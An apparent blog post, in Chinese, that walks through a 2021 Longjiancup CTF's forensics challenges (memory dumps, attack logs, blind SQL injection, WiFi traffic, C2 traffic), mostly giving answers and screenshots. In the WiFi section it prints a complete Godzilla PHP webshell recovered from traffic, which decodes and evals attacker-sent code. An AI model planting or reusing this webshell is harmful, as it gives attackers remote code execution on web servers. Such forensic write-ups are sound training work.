<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="煤矿路口西">
    
    <title>
        
            陇剑杯-2 |
        
        The blog of mklkx
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/favicon.svg">
    
<link rel="stylesheet" href="/css/font-awesome.min.css">

    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"mklkx.github.io","root":"/","language":"zh-CN","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":true,"expand_all":true,"init_open":false},"style":{"primary_color":"#0066CC","avatar":"/images/logo.jpg","favicon":"/images/favicon.svg","article_img_align":"left","left_side_width":"260px","content_max_width":"920px","hover":{"shadow":false,"scale":false},"first_screen":{"enable":"enable","background_img":"/images/bg.svg","description":"(⌐■_■)"},"scroll":{"progress_bar":{"enable":"enable"},"percent":{"enable":"enable"}}},"local_search":{"enable":true,"preload":true},"code_copy":{"enable":true,"style":"default"},"pjax":{"enable":true},"lazyload":{"enable":true},"version":"3.4.3"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 月前","year":"%s 年前"};
  </script>
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="The blog of mklkx" type="application/atom+xml">
</head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fas fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                The blog of mklkx
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation">陇剑杯-2</span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/logo.jpg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">煤矿路口西</span>
                        
                            <span class="author-label">Lv4</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fas fa-edit"></i>&nbsp;2021-09-14 11:13:30
    </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/challenge/">challenge</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E5%8F%96%E8%AF%81/">取证</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>961 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>4 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <h3><span id="首届陇剑杯网络安全大赛-2">首届“<em>陇剑杯</em>”网络安全大赛-2</span></h3>
<hr>
<h4><span id="内存分析">内存分析</span></h4>
<h5><span id="61">6.1</span></h5>
<p>虚拟机密码找mimikatz</p>
<p>安装插件后运行</p>
<p><img lazyload src="/images/loading.svg" data-src="28.png" alt="28"></p>
<p>flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}</p>
<h5><span id="62">6.2</span></h5>
<p>题干提到关键词，某品牌手机&amp;图片</p>
<p>首先搜索桌面文件</p>
<p><img lazyload src="/images/loading.svg" data-src="9.png" alt="29"></p>
<p>发现HUAWEI字样</p>
<p>搜索HUAWEI字样</p>
<p><img lazyload src="/images/loading.svg" data-src="30.png" alt="30"></p>
<p>依次dumpfiles</p>
<p>解压exe文件得到</p>
<p><img lazyload src="/images/loading.svg" data-src="31.png" alt="31"></p>
<p>搜索得到一个解密程序kobackupdec</p>
<p>kali里执行未果</p>
<p>windows中</p>
<p><img lazyload src="/images/loading.svg" data-src="32.png" alt="32"></p>
<p>找到images.tar</p>
<p><img lazyload src="/images/loading.svg" data-src="33.png" alt="33"></p>
<h4><span id="简单日志分析">简单日志分析</span></h4>
<h5><span id="71">7.1</span></h5>
<p><img lazyload src="/images/loading.svg" data-src="34.png" alt="34"></p>
<p>如上图所示，user为攻击参数</p>
<p>答案：user</p>
<h5><span id="72">7.2</span></h5>
<p>解码如同所示base64，发现cat命令查看的文件绝对路径。</p>
<p><img lazyload src="/images/loading.svg" data-src="35.png" alt="35"></p>
<p><img lazyload src="/images/loading.svg" data-src="36.png" alt="36"></p>
<p>答案：/Th4s_IS_VERY_Import_Fi1e</p>
<h5><span id="73">7.3</span></h5>
<p>同样发现一条base64解码后是具有反弹shell的地址，解出。</p>
<p><img lazyload src="/images/loading.svg" data-src="37.png" alt="37"></p>
<p><img lazyload src="/images/loading.svg" data-src="38.png" alt="38"></p>
<p>答案:192.168.2.197:8888</p>
<h4><span id="sql注入">SQL注入</span></h4>
<h5><span id="81">8.1</span></h5>
<p>黑客在注入过程中采用的注入手法叫_____________。（格式为4个汉字，例如“拼搏努力”）</p>
<p><img lazyload src="/images/loading.svg" data-src="39.png" alt="39"></p>
<p>答案：布尔盲注</p>
<h5><span id="82">8.2</span></h5>
<p>黑客在注入过程中，最终获取flag的数据库名、表名和字段名是_____________。（格式为“数据库名#表名#字段名”，例如database#table#column）</p>
<p>直接分析日志，根据if语句的判断条件和每行后面状态码判断就行</p>
<p><img lazyload src="/images/loading.svg" data-src="40.png" alt="40"></p>
<h5><span id="83">8.3</span></h5>
<p>黑客最后获取到的flag字符串为_____________。</p>
<p>同8.2，继续分析日志就行</p>
<p><img lazyload src="/images/loading.svg" data-src="41.png" alt="41"></p>
<p>答案：flag{deddcd67-bcfd-487e-b940-1217e668c7db}</p>
<h4><span id="wifi">wifi</span></h4>
<h5><span id="91">9.1</span></h5>
<p>流量包里记录了攻击机的攻击流量，</p>
<p>参考上述题目，通过filescan发现存在【wifi】字样</p>
<p>下载后是一个加密压缩包</p>
<p><img lazyload src="/images/loading.svg" data-src="42.png" alt="42"></p>
<p>提示Network Adapter GUID</p>
<p>找了很久，意外在iehistory中发现类似字符</p>
<p><img lazyload src="/images/loading.svg" data-src="43.png" alt="43"></p>
<p>{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}/{E3C4941F-44A3-4E23-924D-67A2B3680A87}.xml</p>
<p>尝试解压</p>
<p>得到xml</p>
<p><img lazyload src="/images/loading.svg" data-src="44.png" alt="44"></p>
<p>以为flag是233@114514_qwe</p>
<p>但不对</p>
<p>尝试搜索wifi&amp;解密&amp;WPA2PSK</p>
<p>最后找到https://www.jianshu.com/p/7e8ddf4338cd?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=seo_notes&amp;utm_source=recommendation</p>
<p><img lazyload src="/images/loading.svg" data-src="45.png" alt="45"></p>
<p><img lazyload src="/images/loading.svg" data-src="46.png" alt="46"></p>
<p>得到解码后的流量包</p>
<p>解码无果后，重新尝试哥斯拉木马连接</p>
<p>分别在服务器端和客户端得到</p>
<p>请求包和相应包</p>
<p>通过处理得到</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">，@session_start();</span><br><span class="line">@set_time_limit(0);</span><br><span class="line">@error_reporting(0);</span><br><span class="line">function encode($D,$K)&#123;</span><br><span class="line">    for($i&#x3D;0;$i&lt;strlen($D);$i++) &#123;</span><br><span class="line">        $c &#x3D; $K[$i+1&amp;15];</span><br><span class="line">        $D[$i] &#x3D; $D[$i]^$c;</span><br><span class="line">    &#125;</span><br><span class="line">    return $D;</span><br><span class="line">&#125;</span><br><span class="line">$pass&#x3D;&#39;key&#39;;</span><br><span class="line">$payloadName&#x3D;&#39;payload&#39;;</span><br><span class="line">$key&#x3D;&#39;3c6e0b8a9c15224a&#39;;</span><br><span class="line">if (isset($_POST[$pass]))&#123;</span><br><span class="line">    $data&#x3D;encode(base64_decode($_POST[$pass]),$key);</span><br><span class="line">    if (isset($_SESSION[$payloadName]))&#123;</span><br><span class="line">        $payload&#x3D;encode($_SESSION[$payloadName],$key);</span><br><span class="line">        eval($payload);</span><br><span class="line">        echo substr(md5($pass.$key),0,16);</span><br><span class="line">        echo base64_encode(encode(@run($data),$key));</span><br><span class="line">        echo substr(md5($pass.$key),16);</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        if (stripos($data,&quot;getBasicsInfo&quot;)!&#x3D;&#x3D;false)&#123;</span><br><span class="line">            $_SESSION[$payloadName]&#x3D;encode($data,$key);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>在本地搭建哥斯拉木马连接并修改response</p>
<p><img lazyload src="/images/loading.svg" data-src="47.png" alt="47"></p>
<p>得到flag</p>
<p><img lazyload src="/images/loading.svg" data-src="48.jpg" alt="48"></p>
<h4><span id="ios">ios</span></h4>
<h5><span id="101">10.1</span></h5>
<p>黑客所控制的C&amp;C服务器IP是_____________。</p>
<p>搜索分组字节流github,找到No.17375的数据</p>
<p>最下面就是ip</p>
<p><img lazyload src="/images/loading.svg" data-src="49.png" alt="49"></p>
<p>答案为：3.128.156.159</p>
<h5><span id="102">10.2</span></h5>
<p>黑客利用的Github开源项目的名字是______。（如有字母请全部使用小写）</p>
<p>还是No.17375的数据流，追踪HTTP流就可以看到项目的Github地址，由地址可知名字是Stowaway</p>
<p><img lazyload src="/images/loading.svg" data-src="50.png" alt="50"></p>
<p>所以答案是：stowaway</p>
<h5><span id="103">10.3</span></h5>
<p>通讯加密密钥的明文是____________。</p>
<p>还是No.17375的数据，在ip -s后就是加密密钥</p>
<p><img lazyload src="/images/loading.svg" data-src="51.png" alt="51"></p>
<p>答案： hack4sec</p>
<h5><span id="104">10.4</span></h5>
<p>黑客通过SQL盲注拿到了一个敏感数据，内容是____________。</p>
<p>导入keylog.txt，过滤条件：tcp.stream eq 271 and ip.src == 192.168.1.8 and tls</p>
<p><img lazyload src="/images/loading.svg" data-src="52.png" alt="52"></p>
<p>然后根据这些数据手拼出答案</p>
<p>答案：746558f3-c841-456b-85d7-d6c0f2edabb2</p>
<h5><span id="105">10.5</span></h5>
<p>因为是端口爆破，需要找连续的端口，找了好久只有10-499连续，所以猜测答案是10-499</p>
<p><img lazyload src="/images/loading.svg" data-src="53.png" alt="53"></p>
<p><img lazyload src="/images/loading.svg" data-src="54.png" alt="54"></p>
<p>答案：10-499</p>
<h5><span id="107">10.7</span></h5>
<p>根据10.4的sql盲注，可知攻击了192.168.1.12，又根据access.log攻击者还攻击了172.28.0.2</p>
<p><img lazyload src="/images/loading.svg" data-src="55.png" alt="55"></p>
<p><img lazyload src="/images/loading.svg" data-src="56.png" alt="56"></p>
<p>答案：172.28.0.2#192.168.1.12</p>
<h5><span id="108">10.8</span></h5>
<p>黑客写入了一个webshell，其密码为____________。</p>
<p>打开access.log文件，就可以看到webshell的密码</p>
<p><img lazyload src="/images/loading.svg" data-src="57.png" alt="57"></p>
<p>答案： fxxk</p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul>
        <li>本文标题：陇剑杯-2</li>
        <li>本文作者：煤矿路口西</li>
        <li>创建时间：2021-09-14 11:13:30</li>
        <li>
            本文链接：http://www.mklkx.xyz/2021/09/14/陇剑杯-2/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

            </div>
        

        
            <div class="article-nav">
                
                    <div class="article-prev">
                        <a class="prev"
                           rel="prev"
                           href="/2021/09/21/%E7%A0%B4%E8%A7%A3Android%E9%95%9C%E5%83%8F%E9%94%81%E5%B1%8F%E5%AF%86%E7%A0%81/"
                        >
                            <span class="left arrow-icon flex-center">
                              <i class="fas fa-chevron-left"></i>
                            </span>
                            <span class="title flex-center">
                                <span class="post-nav-title-item">破解Android镜像锁屏密码</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2021/09/14/%E9%99%87%E5%89%91%E6%9D%AF-1/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">陇剑杯-1</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
              <span>2019</span>&nbsp;-&nbsp;
            
            2021&nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;<a href="/">煤矿路口西</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv"></span>&ensp;
                    </span>
                
                
                    <span id="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.3</a>
        </div>
        
            <div class="icp-info info-item"><a target="_blank" rel="nofollow" href="https://beian.miit.gov.cn">冀ICP备2021010275号</a></div>
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-arrows-alt-h"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="fas fa-arrow-up"></i>
            </li>
        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link"><span class="nav-number">1.</span> <span class="nav-text">首届“陇剑杯”网络安全大赛-2</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.1.</span> <span class="nav-text">内存分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.1.1.</span> <span class="nav-text">6.1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.1.2.</span> <span class="nav-text">6.2</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.2.</span> <span class="nav-text">简单日志分析</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.2.1.</span> <span class="nav-text">7.1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.2.2.</span> <span class="nav-text">7.2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.2.3.</span> <span class="nav-text">7.3</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.3.</span> <span class="nav-text">SQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.3.1.</span> <span class="nav-text">8.1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.3.2.</span> <span class="nav-text">8.2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.3.3.</span> <span class="nav-text">8.3</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.4.</span> <span class="nav-text">wifi</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.4.1.</span> <span class="nav-text">9.1</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link"><span class="nav-number">1.5.</span> <span class="nav-text">ios</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.5.1.</span> <span class="nav-text">10.1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.5.2.</span> <span class="nav-text">10.2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.5.3.</span> <span class="nav-text">10.3</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.5.4.</span> <span class="nav-text">10.4</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.5.5.</span> <span class="nav-text">10.5</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.5.6.</span> <span class="nav-text">10.7</span></a></li><li class="nav-item nav-level-5"><a class="nav-link"><span class="nav-number">1.5.7.</span> <span class="nav-text">10.8</span></a></li></ol></li></ol></li></ol>
    </div>
</div>
        </aside>
    

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/dark-light-toggle.js"></script>



    
<script src="/js/local-search.js"></script>




    
<script src="/js/code-copy.js"></script>




    
<script src="/js/lazyload.js"></script>



<div class="post-scripts pjax">
    
        
<script src="/js/left-side-toggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/toc.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
